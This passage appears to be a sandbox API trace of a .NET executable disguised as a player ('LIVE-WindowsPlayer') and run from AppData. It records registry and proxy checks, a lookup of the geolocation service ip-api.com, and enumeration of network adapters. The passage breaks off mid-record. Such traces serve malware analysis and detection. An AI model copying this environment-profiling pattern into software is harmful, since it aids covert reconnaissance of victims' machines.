lpBuffer=0x18e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SystemDefaultTlsVersions", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x0) returned 0x2 [0220.845] GetCurrentProcessId () returned 0x1518 [0220.846] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.846] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2276e28, cb=0x200, lpcbNeeded=0x18ebf0 | out: lphModule=0x2276e28, lpcbNeeded=0x18ebf0) returned 1 [0220.847] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2277098, cb=0x18 | out: lpmodinfo=0x2277098*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.847] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.847] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x1afc1150, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.848] CoTaskMemFree (pv=0x1afc1150) [0220.848] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.848] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x1afc1150, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.848] CoTaskMemFree (pv=0x1afc1150) [0220.848] CloseHandle (hObject=0x4b8) returned 1 [0220.848] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.849] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x0) returned 0x2 [0220.849] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x4b8) returned 0x0 [0220.849] RegQueryValueExW (in: hKey=0x4b8, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x18ec08, lpData=0x0, lpcbData=0x18ec00*=0x0 | out: lpType=0x18ec08*=0x0, lpData=0x0, lpcbData=0x18ec00*=0x0) returned 0x2 [0220.849] RegCloseKey (hKey=0x4b8) returned 0x0 [0220.852] GetCurrentProcessId () returned 0x1518 [0220.852] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0x4b8 [0220.852] EnumProcessModules (in: hProcess=0x4b8, lphModule=0x2279ce0, cb=0x200, lpcbNeeded=0x18ebf0 | out: lphModule=0x2279ce0, lpcbNeeded=0x18ebf0) returned 1 [0220.853] GetModuleInformation (in: hProcess=0x4b8, hModule=0x10000, lpmodinfo=0x2279f50, cb=0x18 | out: lpmodinfo=0x2279f50*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0220.853] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.853] GetModuleBaseNameW (in: hProcess=0x4b8, hModule=0x10000, lpBaseName=0x1afc1150, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0220.854] CoTaskMemFree (pv=0x1afc1150) [0220.854] CoTaskMemAlloc (cb=0x804) returned 0x1afc1150 [0220.854] GetModuleFileNameExW (in: hProcess=0x4b8, hModule=0x10000, lpFilename=0x1afc1150, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0220.854] CoTaskMemFree (pv=0x1afc1150) [0220.854] CloseHandle (hObject=0x4b8) returned 1 [0220.855] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x18e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0220.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SecurityProtocol", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ebc8 | out: phkResult=0x18ebc8*=0x0) returned 0x2 [0220.857] QueryPerformanceFrequency (in: lpFrequency=0x7fff47eb6c98 | out: lpFrequency=0x7fff47eb6c98*=100000000) returned 1 [0220.858] QueryPerformanceCounter (in: lpPerformanceCount=0x18ee48 | out: lpPerformanceCount=0x18ee48*=1920841940104) returned 1 [0221.208] GetCurrentProcess () returned 0xffffffffffffffff [0221.208] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e678 | out: TokenHandle=0x18e678*=0x4b8) returned 1 [0221.215] CloseHandle (hObject=0x4b8) returned 1 [0221.215] GetCurrentProcess () returned 0xffffffffffffffff [0221.216] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e6b8 | out: TokenHandle=0x18e6b8*=0x4b8) returned 1 [0221.217] CloseHandle (hObject=0x4b8) returned 1 [0221.225] GetCurrentProcess () returned 0xffffffffffffffff [0221.225] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ebf8 | out: TokenHandle=0x18ebf8*=0x4b8) returned 1 [0221.803] CoTaskMemAlloc (cb=0xcd0) returned 0x1afc1150 [0221.805] RasEnumConnectionsW (in: param_1=0x1afc1150, param_2=0x18eba0, param_3=0x18eba8 | out: param_1=0x1afc1150, param_2=0x18eba0, param_3=0x18eba8) returned 0x0 [0221.959] CoTaskMemFree (pv=0x1afc1150) [0222.160] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18e8e8 | out: lpWSAData=0x18e8e8) returned 0 [0222.174] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x514 [0222.183] setsockopt (s=0x514, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0222.183] closesocket (s=0x514) returned 0 [0222.184] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x514 [0222.185] setsockopt (s=0x514, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0222.185] closesocket (s=0x514) returned 0 [0222.186] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x514 [0222.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x518 [0222.189] ioctlsocket (in: s=0x514, cmd=-2147195266, argp=0x18ebc8 | out: argp=0x18ebc8) returned 0 [0222.189] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0222.190] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0222.190] ioctlsocket (in: s=0x51c, cmd=-2147195266, argp=0x18ebc8 | out: argp=0x18ebc8) returned 0 [0222.191] WSAIoctl (in: s=0x514, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18eb50, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18eb50, lpOverlapped=0x0) returned -1 [0222.192] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x18e730, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0222.283] WSAEventSelect (s=0x514, hEventObject=0x518, lNetworkEvents=512) returned 0 [0222.283] WSAIoctl (in: s=0x51c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18eb50, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18eb50, lpOverlapped=0x0) returned -1 [0222.283] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x18e730, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0222.283] WSAEventSelect (s=0x51c, hEventObject=0x520, lNetworkEvents=512) returned 0 [0222.284] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x528 [0222.285] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x528, param_3=0x3) returned 0x0 [0222.312] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x18ec38 | out: phkResult=0x18ec38*=0x540) returned 0x0 [0222.313] RegOpenKeyExW (in: hKey=0x540, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18eb88 | out: phkResult=0x18eb88*=0x544) returned 0x0 [0222.313] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x548 [0222.313] RegNotifyChangeKeyValue (hKey=0x544, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x548, fAsynchronous=1) returned 0x0 [0222.314] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18eb90 | out: phkResult=0x18eb90*=0x54c) returned 0x0 [0222.315] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x550 [0222.315] RegNotifyChangeKeyValue (hKey=0x54c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x550, fAsynchronous=1) returned 0x0 [0222.315] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18eb90 | out: phkResult=0x18eb90*=0x554) returned 0x0 [0222.315] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x558 [0222.316] RegNotifyChangeKeyValue (hKey=0x554, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x558, fAsynchronous=1) returned 0x0 [0222.316] GetCurrentProcess () returned 0xffffffffffffffff [0222.316] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18eb08 | out: TokenHandle=0x18eb08*=0x55c) returned 1 [0222.444] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x18dc18 | out: phkResult=0x18dc18*=0x56c) returned 0x0 [0222.444] RegQueryValueExW (in: hKey=0x56c, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x18dc58, lpData=0x0, lpcbData=0x18dc50*=0x0 | out: lpType=0x18dc58*=0x0, lpData=0x0, lpcbData=0x18dc50*=0x0) returned 0x2 [0222.444] RegCloseKey (hKey=0x56c) returned 0x0 [0222.457] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x1afc7cb0 [0222.478] WinHttpSetTimeouts (hInternet=0x1afc7cb0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0222.479] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x18eb80 | out: pProxyConfig=0x18eb80) returned 1 [0222.851] CloseHandle (hObject=0x4b8) returned 1 [0222.868] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x18dc90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0222.869] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x18dc90, nSize=0x80 | out: lpBuffer="") returned 0x0 [0222.878] EtwEventRegister () returned 0x0 [0222.884] EtwEventSetInformation () returned 0x0 [0223.005] GetCurrentProcess () returned 0xffffffffffffffff [0223.005] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e5e8 | out: TokenHandle=0x18e5e8*=0x5b0) returned 1 [0223.009] CloseHandle (hObject=0x5b0) returned 1 [0223.009] GetCurrentProcess () returned 0xffffffffffffffff [0223.009] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e628 | out: TokenHandle=0x18e628*=0x5b0) returned 1 [0223.010] CloseHandle (hObject=0x5b0) returned 1 [0223.018] EtwEventRegister () returned 0x0 [0223.018] EtwEventSetInformation () returned 0x0 [0223.022] SetEvent (hEvent=0x430) returned 1 [0223.160] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e8d0*=0x528, lpdwindex=0x18e6b4 | out: lpdwindex=0x18e6b4) returned 0x80010115 [0223.161] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e880*=0x518, lpdwindex=0x18e664 | out: lpdwindex=0x18e664) returned 0x80010115 [0223.161] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e880*=0x520, lpdwindex=0x18e664 | out: lpdwindex=0x18e664) returned 0x80010115 [0223.161] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e950*=0x548, lpdwindex=0x18e734 | out: lpdwindex=0x18e734) returned 0x80010115 [0223.162] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e950*=0x550, lpdwindex=0x18e734 | out: lpdwindex=0x18e734) returned 0x80010115 [0223.162] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18e950*=0x558, lpdwindex=0x18e734 | out: lpdwindex=0x18e734) returned 0x80010115 [0223.168] GetCurrentProcess () returned 0xffffffffffffffff [0223.169] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e4a8 | out: TokenHandle=0x18e4a8*=0x5c4) returned 1 [0223.172] CloseHandle (hObject=0x5c4) returned 1 [0223.172] GetCurrentProcess () returned 0xffffffffffffffff [0223.172] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e4e8 | out: TokenHandle=0x18e4e8*=0x5c4) returned 1 [0223.173] CloseHandle (hObject=0x5c4) returned 1 [0223.177] GetTimeZoneInformation (in: lpTimeZoneInformation=0x18e8f0 | out: lpTimeZoneInformation=0x18e8f0) returned 0x2 [0223.184] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x18e6f8 | out: pTimeZoneInformation=0x18e6f8) returned 0x2 [0223.191] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Central European Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e6c8 | out: phkResult=0x18e6c8*=0x5c4) returned 0x0 [0223.192] RegQueryValueExW (in: hKey=0x5c4, lpValueName="TZI", lpReserved=0x0, lpType=0x18e708, lpData=0x0, lpcbData=0x18e700*=0x0 | out: lpType=0x18e708*=0x3, lpData=0x0, lpcbData=0x18e700*=0x2c) returned 0x0 [0223.192] RegQueryValueExW (in: hKey=0x5c4, lpValueName="TZI", lpReserved=0x0, lpType=0x18e708, lpData=0x2288838, lpcbData=0x18e700*=0x2c | out: lpType=0x18e708*=0x3, lpData=0x2288838*, lpcbData=0x18e700*=0x2c) returned 0x0 [0223.193] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Central European Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x18e4d8 | out: phkResult=0x18e4d8*=0x0) returned 0x2 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x18e698, lpData=0x0, lpcbData=0x18e690*=0x0 | out: lpType=0x18e698*=0x1, lpData=0x0, lpcbData=0x18e690*=0x20) returned 0x0 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x18e698, lpData=0x2288d68, lpcbData=0x18e690*=0x20 | out: lpType=0x18e698*=0x1, lpData="@tzres.dll,-290", lpcbData=0x18e690*=0x20) returned 0x0 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x18e698, lpData=0x0, lpcbData=0x18e690*=0x0 | out: lpType=0x18e698*=0x1, lpData=0x0, lpcbData=0x18e690*=0x20) returned 0x0 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x18e698, lpData=0x2288dd8, lpcbData=0x18e690*=0x20 | out: lpType=0x18e698*=0x1, lpData="@tzres.dll,-292", lpcbData=0x18e690*=0x20) returned 0x0 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x18e698, lpData=0x0, lpcbData=0x18e690*=0x0 | out: lpType=0x18e698*=0x1, lpData=0x0, lpcbData=0x18e690*=0x20) returned 0x0 [0223.195] RegQueryValueExW (in: hKey=0x5c4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x18e698, lpData=0x2288e48, lpcbData=0x18e690*=0x20 | out: lpType=0x18e698*=0x1, lpData="@tzres.dll,-291", lpcbData=0x18e690*=0x20) returned 0x0 [0223.266] CoTaskMemAlloc (cb=0x20c) returned 0x68a5c0 [0223.266] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x68a5c0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0223.268] CoTaskMemFree (pv=0x68a5c0) [0223.269] CoTaskMemAlloc (cb=0x20c) returned 0x68ae40 [0223.269] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath=0x68ae40, pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8 | out: pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8) returned 1 [0223.273] CoTaskMemFree (pv=0x0) [0223.273] CoTaskMemFree (pv=0x68ae40) [0223.274] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6c0001 [0223.276] CoTaskMemAlloc (cb=0x3ec) returned 0x1afdab10 [0223.276] LoadStringW (in: hInstance=0x6c0001, uID=0x122, lpBuffer=0x1afdab10, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Sarajevo, Skopje, Warsaw, Zagreb") returned 0x2c [0223.276] CoTaskMemFree (pv=0x1afdab10) [0223.277] FreeLibrary (hLibModule=0x6c0001) returned 1 [0223.277] CoTaskMemAlloc (cb=0x20c) returned 0x6896e0 [0223.277] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6896e0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0223.277] CoTaskMemFree (pv=0x6896e0) [0223.277] CoTaskMemAlloc (cb=0x20c) returned 0x68ae40 [0223.278] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath=0x68ae40, pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8 | out: pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8) returned 1 [0223.279] CoTaskMemFree (pv=0x0) [0223.279] CoTaskMemFree (pv=0x68ae40) [0223.279] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6c0001 [0223.281] CoTaskMemAlloc (cb=0x3ec) returned 0x1afdab10 [0223.281] LoadStringW (in: hInstance=0x6c0001, uID=0x124, lpBuffer=0x1afdab10, cchBufferMax=500 | out: lpBuffer="Central European Standard Time") returned 0x1e [0223.281] CoTaskMemFree (pv=0x1afdab10) [0223.281] FreeLibrary (hLibModule=0x6c0001) returned 1 [0223.282] CoTaskMemAlloc (cb=0x20c) returned 0x68a180 [0223.282] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x68a180 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0223.282] CoTaskMemFree (pv=0x68a180) [0223.282] CoTaskMemAlloc (cb=0x20c) returned 0x68ae40 [0223.282] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath=0x68ae40, pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8 | out: pwszLanguage=0x0, pcchLanguage=0x18e6e0, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x18e6e8, pululEnumerator=0x18e6d8) returned 1 [0223.284] CoTaskMemFree (pv=0x0) [0223.284] CoTaskMemFree (pv=0x68ae40) [0223.284] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6c0001 [0223.285] CoTaskMemAlloc (cb=0x3ec) returned 0x1afdab10 [0223.285] LoadStringW (in: hInstance=0x6c0001, uID=0x123, lpBuffer=0x1afdab10, cchBufferMax=500 | out: lpBuffer="Central European Daylight Time") returned 0x1e [0223.285] CoTaskMemFree (pv=0x1afdab10) [0223.285] FreeLibrary (hLibModule=0x6c0001) returned 1 [0223.286] RegCloseKey (hKey=0x5c4) returned 0x0 [0223.287] SetEvent (hEvent=0x430) returned 1 [0223.302] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x18eb48 | out: pFixedInfo=0x0, pOutBufLen=0x18eb48) returned 0x6f [0223.551] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1afc67d0 [0223.551] GetNetworkParams (in: pFixedInfo=0x1afc67d0, pOutBufLen=0x18eb48 | out: pFixedInfo=0x1afc67d0, pOutBufLen=0x18eb48) returned 0x0 [0223.571] LocalFree (hMem=0x1afc67d0) returned 0x0 [0223.633] CoTaskMemAlloc (cb=0x20c) returned 0x6896e0 [0223.633] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x6896e0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0223.633] CoTaskMemFree (pv=0x6896e0) [0223.633] CoTaskMemAlloc (cb=0x20c) returned 0x6896e0 [0223.633] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x6896e0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0223.634] CoTaskMemFree (pv=0x6896e0) [0223.657] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x618 [0223.660] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5e8 [0223.662] GetAddrInfoW (in: pNodeName="ip-api.com", pServiceName=0x0, pHints=0x18e978*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18e8c0 | out: ppResult=0x18e8c0*=0x1afdd8b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x660580*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) returned 0 [0223.986] FreeAddrInfoW (pAddrInfo=0x1afdd8b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x660580*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) [0223.988] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a8 [0223.988] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x634 [0223.989] ioctlsocket (in: s=0x5a8, cmd=-2147195266, argp=0x18e8e8 | out: argp=0x18e8e8) returned 0 [0223.989] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x638 [0223.990] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x63c [0223.990] ioctlsocket (in: s=0x638, cmd=-2147195266, argp=0x18e8e8 | out: argp=0x18e8e8) returned 0 [0223.990] WSAIoctl (in: s=0x5a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18e870, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18e870, lpOverlapped=0x0) returned -1 [0223.990] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x18e450, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0223.990] WSAEventSelect (s=0x5a8, hEventObject=0x634, lNetworkEvents=512) returned 0 [0223.990] WSAIoctl (in: s=0x638, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18e870, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18e870, lpOverlapped=0x0) returned -1 [0223.990] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x18e450, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0223.990] WSAEventSelect (s=0x638, hEventObject=0x63c, lNetworkEvents=512) returned 0 [0223.991] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x18e8d8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x18e8d8*=0x3fff) returned 0x6f [0224.257] LocalAlloc (uFlags=0x0, uBytes=0x3fff) returned 0x1afe6bd0 [0224.263] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x1afe6bd0, SizePointer=0x18e8d8*=0x3fff | out: AdapterAddresses=0x1afe6bd0*(Alignment=0x5000001c0, Length=0x1c0, IfIndex=0x5, Next=0x1afe6ee8, AdapterName="{4CF1065B-D84E-418E-BA85-C567B0CB4A2F}", FirstUnicastAddress=0x1afe6e38, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0xc, [2]=0x35, [3]=0xa4, [4]=0x1d, [5]=0x84, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, 